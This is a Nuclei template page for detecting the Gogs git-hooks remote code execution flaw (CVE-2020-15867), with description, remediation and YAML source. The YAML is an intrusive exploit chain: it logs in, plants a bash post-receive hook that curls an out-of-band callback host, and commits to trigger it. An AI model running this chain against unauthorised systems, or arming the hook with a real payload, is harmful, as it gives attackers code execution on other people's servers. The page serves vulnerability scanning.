Skip to content
Nuclei Templates

Gogs 0.5.5 - 0.12.2 - Remote Code Execution

ID: CVE-2020-15867

Severity: high

Author: theamanrawat

Tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive

Description

Section titled “Description”

Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a “product UI does not warn user of unsafe actions” issue.

YAML Source

Section titled “YAML Source”
id: CVE-2020-15867


info:
  name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).
  reference:
    - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
    - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
    - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2020-15867
    epss-score: 0.96659
    epss-percentile: 0.99554
    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: gogs
    product: gogs
    shodan-query:
      - cpe:"cpe:2.3:a:gogs:gogs"
      - http.title:"sign in - gogs"
    fofa-query: title="sign in - gogs"
    google-query: intitle:"sign in - gogs"
  tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive


http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
      - |
        POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
      - |
        GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http


      - type: word
        part: body_1
        words:
          - content="Gogs


    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="(.*)"
        internal: true


      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="(.*)"
        internal: true


      - type: regex
        name: last_commit
        group: 1
        regex:
          - name="last_commit" value="(.*)"
        internal: true
# digest: 4b0a00483046022100b236fc0554b8687674b023685a537d424e10fab9dc3193ce0b8c664edb7633a202210095efb43fa800690bcd19ec8a5940efbd49600adce7fa59b81cea983aaae46ef5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-15867.yaml"

View on Github